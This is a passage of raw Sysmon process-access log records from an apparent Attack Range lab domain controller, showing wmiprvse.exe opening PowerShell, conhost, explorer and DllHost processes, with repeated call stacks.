ystem32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242169Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.565{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD2-603E-CAAA-00000000AD01}12336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242168Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.565{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD2-603E-C9AA-00000000AD01}9940C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002242167Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.564{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51C26C5D42D2154A1BA64C3A3AA8EB86,SHA256=14ED9D5B8010136BCFB24BA2F324145C3A7D77822584FCB956CA58B6E7297397,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002242166Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.564{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD2-603E-C8AA-00000000AD01}12460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242165Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.561{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242164Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.545{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242163Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.545{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CAF-603E-33AA-00000000AD01}8188C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242162Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.545{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242161Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.545{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242160Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.545{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242159Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.545{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242158Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.545{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242157Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.545{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242156Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.545{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242155Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.545{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242154Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.545{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242153Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.545{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242152Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.545{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242151Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.545{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242150Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.545{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242149Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 